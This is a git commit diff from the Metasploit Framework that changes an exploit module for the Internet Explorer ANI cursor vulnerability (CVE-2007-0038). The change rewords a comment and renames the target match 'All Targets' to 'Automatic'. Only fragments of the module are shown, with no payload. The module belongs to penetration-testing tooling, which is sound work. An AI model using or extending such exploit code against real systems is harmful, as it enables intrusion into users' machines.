Woops, forgot to change all references to the 'All Target's item

git-svn-id: file:///home/svn/framework3/trunk@4601 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-01 21:10:15 +00:00
parent 775d8bc95b
commit 0c263cf036
1 changed files with 4 additions and 3 deletions

View File

@ -72,9 +72,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
# #
# Use multiple cursor URLs to try all targets at once # Use multiple cursor URLs to try all targets for a particular
# This can result in multiple, sequential sessions # operating system. This can result in multiple, sequential sessions
# #
[ 'Automatic', { }], [ 'Automatic', { }],
# #
@ -166,7 +167,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
"</title>" + "</title>" +
"</head><body>" + rand_text_alphanumeric(rand(128)+1) "</head><body>" + rand_text_alphanumeric(rand(128)+1)
mytargs = (target.name =~ /All Targets/) ? targets : [target] mytargs = (target.name =~ /Automatic/) ? targets : [target]
if target.name =~ /Automatic/ if target.name =~ /Automatic/
targets.each_index { |i| targets.each_index { |i|